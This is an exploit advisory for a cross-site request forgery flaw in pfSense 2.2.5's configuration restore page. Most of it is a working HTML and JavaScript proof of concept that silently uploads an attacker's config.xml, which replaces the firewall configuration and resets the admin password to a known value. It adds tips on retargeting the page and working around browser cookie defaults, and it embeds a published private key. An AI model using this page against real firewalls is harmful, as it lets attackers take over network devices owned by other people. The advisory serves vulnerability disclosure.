pfSense Firewall 2.2.5 Cross Site Request Forgery
Posted on 26 January 2016
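<!--
# Exploit Title: pfSense Firewall 2.2.5 Cross-Site Request Forgery
# Date: 23-01-2016
# Software Link: http://mirror.ancl.hawaii.edu/pub/pfSense/downloads/pfSense-2.2.5-RELEASE-1g-amd64-nanobsd.img.gz
# Exploit Author: Aatif Shahdad
# Twitter: https://twitter.com/61617469665f736
# Contact: aatif_shahdad@icloud.com
# Category: webapps

1. Description

The page diag_backup.php had CSRF checking disabled for all of its functions,
including the restore function. As a result, a specially crafted attacker page
could cause a logged-in administrator to upload a config.xml crafted by the
attacker, replacing the firewall's entire configuration.

2. Proof of Concept

Log in as admin to the web console of the target firewall. The author's test
install answered at 192.168.0.103 (the address assigned at install time); the
page below posts to https://192.168.0.103/diag_backup.php, so change that URL
to the target's address before use. Then open this page in the browser that
holds the admin session and click "Submit request".

Notes for anyone reproducing this:
  * The request is a plain multipart/form-data POST with no custom headers, so
    the browser sends it cross-site without a CORS preflight; the response
    cannot be read, but the server has already processed the restore by then.
  * The session cookie only travels with this cross-site POST if the browser
    attaches it. Browsers that default cookies to SameSite=Lax (a change that
    post-dates this advisory) will not, so reproduce on a browser of the era
    or with that default disabled.
  * The supplied config is the author's throwaway test configuration. Its
    <cert> entry is incomplete in this copy (see the comment inside the XML)
    and its <prv> element is a private key that is now public; do not reuse
    that certificate entry anywhere.

PoC page that uploads the crafted config.xml:

[PoC begins]
-->
<html>
<body>
  <!--
    The config.xml payload, kept as plain XML in a non-executed script element
    so it needs no string escaping. The XML declaration must be the very first
    bytes of the uploaded file, so it sits on the same line as the opening tag.
  -->
  <script type="text/xml" id="config-xml"><?xml version="1.0"?>
<pfsense>
  <version>12.0</version>
  <lastchange/>
  <theme>pfsense_ng</theme>
  <system>
    <optimization>normal</optimization>
    <hostname>pfSense</hostname>
    <domain>localdomain</domain>
    <group>
      <name>all</name>
      <description><![CDATA[All Users]]></description>
      <scope>system</scope>
      <gid>1998</gid>
      <member>0</member>
    </group>
    <group>
      <name>admins</name>
      <description><![CDATA[System Administrators]]></description>
      <scope>system</scope>
      <gid>1999</gid>
      <member>0</member>
      <priv>page-all</priv>
    </group>
    <user>
      <name>admin</name>
      <descr><![CDATA[System Administrator]]></descr>
      <scope>system</scope>
      <groupname>admins</groupname>
      <!-- after the restore the admin password is whatever this hash encodes;
           per the advisory it is "pfsense" for this config -->
      <password>$1$HuUrmCMQ$HcpUfJ7bi2kDoPmwaW5Hf.</password>
      <uid>0</uid>
      <priv>user-shell-access</priv>
      <md5-hash>3a4b4c4dde494d2cec3e0ea68e437e17</md5-hash>
      <nt-hash>3338333834323034353935373932633863623430663264336164663532353636</nt-hash>
    </user>
    <nextuid>2000</nextuid>
    <nextgid>2000</nextgid>
    <timezone>Etc/UTC</timezone>
    <time-update-interval/>
    <timeservers>0.pfsense.pool.ntp.org</timeservers>
    <webgui>
      <protocol>https</protocol>
      <loginautocomplete/>
      <ssl-certref>56a352ca3e5fb</ssl-certref>
    </webgui>
    <disablenatreflection>yes</disablenatreflection>
    <disablesegmentationoffloading/>
    <disablelargereceiveoffloading/>
    <ipv6allow/>
    <powerd_ac_mode>hadp</powerd_ac_mode>
    <powerd_battery_mode>hadp</powerd_battery_mode>
    <powerd_normal_mode>hadp</powerd_normal_mode>
    <bogons>
      <interval>monthly</interval>
    </bogons>
    <kill_states/>
    <language>en_US</language>
    <dns1gw>none</dns1gw>
    <dns2gw>none</dns2gw>
    <dns3gw>none</dns3gw>
    <dns4gw>none</dns4gw>
    <dnsserver>8.8.8.8</dnsserver>
    <dnsserver>8.8.8.8</dnsserver>
    <dnsallowoverride/>
  </system>
  <interfaces>
    <wan>
      <enable/>
      <if>em0</if>
      <ipaddr>dhcp</ipaddr>
      <ipaddrv6>dhcp6</ipaddrv6>
      <gateway/>
      <blockbogons>on</blockbogons>
      <media/>
      <mediaopt/>
      <dhcp6-duid/>
      <dhcp6-ia-pd-len>0</dhcp6-ia-pd-len>
    </wan>
  </interfaces>
  <staticroutes/>
  <dhcpd/>
  <pptpd>
    <mode/>
    <redir/>
    <localip/>
    <remoteip/>
  </pptpd>
  <snmpd>
    <syslocation/>
    <syscontact/>
    <rocommunity>public</rocommunity>
  </snmpd>
  <diag>
    <ipv6nat>
      <ipaddr/>
    </ipv6nat>
  </diag>
  <bridge/>
  <syslog/>
  <filter>
    <rule>
      <type>pass</type>
      <ipprotocol>inet</ipprotocol>
      <descr><![CDATA[Default allow LAN to any rule]]></descr>
      <interface>lan</interface>
      <tracker>0100000101</tracker>
      <source>
        <network>lan</network>
      </source>
      <destination>
        <any/>
      </destination>
    </rule>
    <rule>
      <type>pass</type>
      <ipprotocol>inet6</ipprotocol>
      <descr><![CDATA[Default allow LAN IPv6 to any rule]]></descr>
      <interface>lan</interface>
      <tracker>0100000102</tracker>
      <source>
        <network>lan</network>
      </source>
      <destination>
        <any/>
      </destination>
    </rule>
  </filter>
  <ipsec/>
  <aliases/>
  <proxyarp/>
  <cron>
    <item>
      <minute>1,31</minute>
      <hour>0-5</hour>
      <mday>*</mday>
      <month>*</month>
      <wday>*</wday>
      <who>root</who>
      <command>/usr/bin/nice -n20 adjkerntz -a</command>
    </item>
    <item>
      <minute>1</minute>
      <hour>3</hour>
      <mday>1</mday>
      <month>*</month>
      <wday>*</wday>
      <who>root</who>
      <command>/usr/bin/nice -n20 /etc/rc.update_bogons.sh</command>
    </item>
    <item>
      <minute>*/60</minute>
      <hour>*</hour>
      <mday>*</mday>
      <month>*</month>
      <wday>*</wday>
      <who>root</who>
      <command>/usr/bin/nice -n20 /usr/local/sbin/expiretable -v -t 3600 sshlockout</command>
    </item>
    <item>
      <minute>*/60</minute>
      <hour>*</hour>
      <mday>*</mday>
      <month>*</month>
      <wday>*</wday>
      <who>root</who>
      <command>/usr/bin/nice -n20 /usr/local/sbin/expiretable -v -t 3600 webConfiguratorlockout</command>
    </item>
    <item>
      <minute>1</minute>
      <hour>1</hour>
      <mday>*</mday>
      <month>*</month>
      <wday>*</wday>
      <who>root</who>
      <command>/usr/bin/nice -n20 /etc/rc.dyndns.update</command>
    </item>
    <item>
      <minute>*/60</minute>
      <hour>*</hour>
      <mday>*</mday>
      <month>*</month>
      <wday>*</wday>
      <who>root</who>
      <command>/usr/bin/nice -n20 /usr/local/sbin/expiretable -v -t 3600 virusprot</command>
    </item>
    <item>
      <minute>30</minute>
      <hour>12</hour>
      <mday>*</mday>
      <month>*</month>
      <wday>*</wday>
      <who>root</who>
      <command>/usr/bin/nice -n20 /etc/rc.update_urltables</command>
    </item>
  </cron>
  <wol/>
  <rrd>
    <enable/>
  </rrd>
  <load_balancer>
    <monitor_type>
      <name>ICMP</name>
      <type>icmp</type>
      <descr><![CDATA[ICMP]]></descr>
      <options/>
    </monitor_type>
    <monitor_type>
      <name>TCP</name>
      <type>tcp</type>
      <descr><![CDATA[Generic TCP]]></descr>
      <options/>
    </monitor_type>
    <monitor_type>
      <name>HTTP</name>
      <type>http</type>
      <descr><![CDATA[Generic HTTP]]></descr>
      <options>
        <path>/</path>
        <host/>
        <code>200</code>
      </options>
    </monitor_type>
    <monitor_type>
      <name>HTTPS</name>
      <type>https</type>
      <descr><![CDATA[Generic HTTPS]]></descr>
      <options>
        <path>/</path>
        <host/>
        <code>200</code>
      </options>
    </monitor_type>
    <monitor_type>
      <name>SMTP</name>
      <type>send</type>
      <descr><![CDATA[Generic SMTP]]></descr>
      <options>
        <send/>
        <expect>220 *</expect>
      </options>
    </monitor_type>
  </load_balancer>
  <widgets>
    <sequence>system_information-container:col1:show,captive_portal_status-container:col1:close,carp_status-container:col1:close,cpu_graphs-container:col1:close,gateways-container:col1:close,gmirror_status-container:col1:close,installed_packages-container:col1:close,interface_statistics-container:col1:close,interfaces-container:col2:show,ipsec-container:col2:close,load_balancer_status-container:col2:close,log-container:col2:close,picture-container:col2:close,rss-container:col2:close,services_status-container:col2:close,traffic_graphs-container:col2:close</sequence>
  </widgets>
  <openvpn/>
  <dnshaper/>
  <unbound>
    <enable/>
    <dnssec/>
    <active_interface/>
    <outgoing_interface/>
    <custom_options/>
    <hideidentity/>
    <hideversion/>
    <dnssecstripped/>
  </unbound>
  <vlans/>
  <revision>
    <time>1453547589</time>
    <description><![CDATA[admin@192.168.0.101: System: ]]></description>
    <username>admin@192.168.0.101</username>
  </revision>
  <shaper/>
  <cert>
    <refid>56a352ca3e5fb</refid>
    <descr><![CDATA[webConfigurator default (56a352ca3e5fb)]]></descr>
    <type>server</type>
    <!-- The base64 certificate element (<crt>) that belongs here is missing
         from this copy of the advisory. Without it the <ssl-certref> above
         points at a cert entry with no certificate; supply your own <crt>
         and a matching <prv> before using this config. -->
    <!-- Private key of the author's test VM. It has been published with this
         advisory, so it is compromised by definition; never reuse it. -->
    <prv>LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUV2d0lCQURBTkJna3Foa2lHOXcwQkFRRUZBQVNDQktrd2dnU2xBZ0VBQW9JQkFRRG53dmJ2QVRiRDNpUTMKbU02NzlQUlFacnF2UVZGbWJkOEsrQkMwaUkrOVE4TEVmTjBLMnVOTUdJWmo3SDVJckdsa01NR2kySHl0M2NwWgpHNTBlUGpPbG1Bb24yM0svWnBTeElLdVBDd0d5cWlRT3kyeGxGTzhVTTRzNTNDVW5qU3BhSDVYY2ZuNXYxd25jCjVIdGE5OGJ6VEFWRStmc0hYVjdUQWhRdzBrZHlhU0tXMmlRaFFsRkNhUkVqbm43Q0FFYVJnaWt6WUgzcyt3cFUKaFp4RzQ4bkZDbE53akZWcWpxUWRQVUFMNlZKMnI0dk5DS1FqWUFVVHVSTnpIa1Q2alorMVVWV3NldnFoZHE5WApjUDZGOTJtRm0xVklGaFpvV3VucDVRR2x1ZXdGTzJ5UDVGbTRwTjljYmNqWTh4cFgwL2JvRzlRMnBUR2E4R1d5CmxnVGdpSkI3QWdNQkFBRUNnZ0VCQUs2ZjlEYzVqdTRlSHVQVk8wL2J6WW9YSFdxWHFLR28vM25nVjVYdm4zNVgKNUJUd2tBeHh5UG01TU9seGMrV0dJeExldWNmZG5uUFN2WGhPbWlBRGRoNjdaRXVMeWZYMWNPdlZWZTY5dUZYSwpaTWpROWFka0VwQUNGbEZPVXFCdWVRN1c1YS94ajRydFYvMGNHdVg3OCtlMXkvS2crRWdnVGlablZwZENtWnJWCnRhTXhkcmRIemR0NjlGaU1MWU1kaE9iMUN0azEvRFp4dzhETDB6RXBseWpQNEE5MDA2VWJtT2Y3WXlRQUpkeEcKVGlwNzY5RkdML2x6MU1SVmNmb2drUVRzU0w5OHpuSUNqTXRXeWozL2FrYkxtRCtGeHRaU2UzNHl4c2xoc0I5bApocFJ0alBIUWQ5cmtYYWR4WW51SzJ0U0pxQTgxREhYNFhyQWVmb0RrbjhFQ2dZRUE5MFlIaTJtR2dTRm5mdVFGCnpzRkNXU0ZZbWhrSnZLbVFKQ3NXWW5NN2JoNVdPVnBaM2d3RXh1MFNpdE5aWDBVaWRkR1U5NUhCdUtDWnNvRHEKQnlwQTRuUXdUdkVtWGdpNEh4cGd4bUJDSGkvRGt6eDhpVkkwd3BKNXJzWjBpNXlIcHZtYVVRT0t4WG9FOVpnUApXR1FVSDNUTXViOElsN2RWS2JISjN3T2tJUk1DZ1lFQTcvRExLYXFkWFc5OTlCd00zZlhHNkJYaUxDSXhwaGh3Cm9jSHF0ekxMcS9Ra0dVSzhaTWRlWTNhYi85dHFMWkVBMlVLQjJLdW5ZQUcyVUJZQmNiaVFNNTFCNHREemgvZ20KbTUwSmVMZjZ1SWFRdlAxeVV6QWE1NXpiTEx4WTRlZ2s1MFpZeXErWmF5TEd3dm5PeUVyN3pSWEM0REQrK3RjZQpTaW4rKzFXTHAva0NnWUVBaHFRT0ZaNDNDL2NKYUxGMmJCY1ZMbjBXeG9tZG9LbmZmNklxaFI3am5GbE9iOW8vCmxzV0trRnFrUHcxSDI3VkVSMDBBUlRHTGZ5R0xyd084Nm52YWFyUURYZWkzRUhyRTdzS3BNVHRXcFNNeTVlZ0kKazZrOGF6bmdvZ2NUakxXRnM2aXpteXRIazdHV0k3aFJtcnFicm1rbDFIb3RqcGJYKzJVQVc3dWEwaHNDZ1lCLwpsSHFDUWkwQWhJcmxaSkRXNkp1RnhqVUhvSHJqeFRVR1haVFBLbHd2cDFZV2RHeTE3V2hiM0xKZ0hpdmI1TEVkCjFJWTBUamxtRENNRGZGL3lOdCsrQWcwSmJHOUJTZ3BGVGYrK1I1MHh4cU5wU2g0aTYzNHl6eTJmSU5ybDY4akwKakpVajJMRHJ6WWNBSDFIN0lCdTVWYXZVQjFsY3lVdGF4ZS9GZGh3WENRS0JnUURDMlJvN0ZETFNqYlI1RDYyVgoxSkgzVFV1Z2ZiRmliQllRazYrMit6eHVjeTN4V3B1UnBWYVRqSGJvS3N6S2NTS09UK251cWJ4YS9Fbmh0VFZlClc1WnJGMlM3VkpPcERZVEwyZkR0VmJZZ0xJUmp5d0JKM3lUTmFoWmxUZ0FVKzM1MGgvV0NEcnVHMXVqZnJOVzAKZ3pFeU9nRSt3UWNMSi8rNmNHZjk1Mmg4b2c9PQotLS0tLUVORCBQUklWQVRFIEtFWS0tLS0tCg==</prv>
  </cert>
  <ppps/>
</pfsense>
</script>

  <script>
    // Restore endpoint on the target. The author's test install was at
    // 192.168.0.103; its config sets <protocol>https</protocol>, which is why
    // the PoC speaks HTTPS here even though the advisory text mentions http.
    // Change this to the victim firewall's address.
    var TARGET = "https://192.168.0.103/diag_backup.php";

    // Filename the config is uploaded under (the name pfSense itself gives
    // downloaded backups). The server does not key on it.
    var CONFIG_FILENAME = "config-pfSense.localdomain-20160123123616.xml";

    // Reads the config.xml payload out of the non-executed script element above.
    // Leading whitespace is stripped so the XML declaration is the first byte of
    // the uploaded file, as XML requires.
    function configXml() {
      var raw = document.getElementById("config-xml").textContent;
      return raw.replace(/^\s+/, "");
    }

    // Builds the same form that the "Restore configuration" button on
    // diag_backup.php submits, with the same fields in the same order.
    // FormData lets the browser generate the multipart boundary and CRLF
    // framing, which the hand-built body of the original PoC got wrong once
    // its escape sequences were mangled in transit.
    function buildRestoreForm() {
      var form = new FormData();
      form.append("backuparea", "");
      form.append("donotbackuprrd", "on");
      form.append("encrypt_password", "");
      form.append("encrypt_passconf", "");
      form.append("restorearea", "");
      form.append("conffile", new Blob([configXml()], { type: "text/xml" }), CONFIG_FILENAME);
      form.append("decrypt_password", "");
      form.append("decrypt_passconf", "");
      form.append("Submit", "Restore configuration");
      return form;
    }

    // Fires the forged restore request. withCredentials makes the browser attach
    // the victim's existing pfSense session cookie; no CSRF token is sent because
    // diag_backup.php in 2.2.5 does not check one. The Accept / Accept-Language
    // headers copied from a browser capture in the original PoC are not needed
    // and are omitted. The response is not readable cross-origin and is ignored.
    function submitRequest() {
      var xhr = new XMLHttpRequest();
      xhr.open("POST", TARGET, true);
      xhr.withCredentials = true;
      xhr.send(buildRestoreForm());
    }
  </script>

  <form action="#">
    <input type="button" value="Submit request" onclick="submitRequest();" />
  </form>
</body>
</html>
<!--
[End of PoC]

The firewall restarts and comes back running the configuration supplied above,
i.e. whatever the attacker put in the uploaded config.xml.

Note: after the PoC runs the credentials are admin / pfsense (the <password>
hash in the supplied config).

3. Impact

Through diag_backup.php the firewall configuration could be altered or replaced
entirely if an administrator could be tricked into loading a specially crafted
page while logged in to the firewall in the same browser session.

4. Solution

Update to version 2.2.6: https://www.pfsense.org/download/
-->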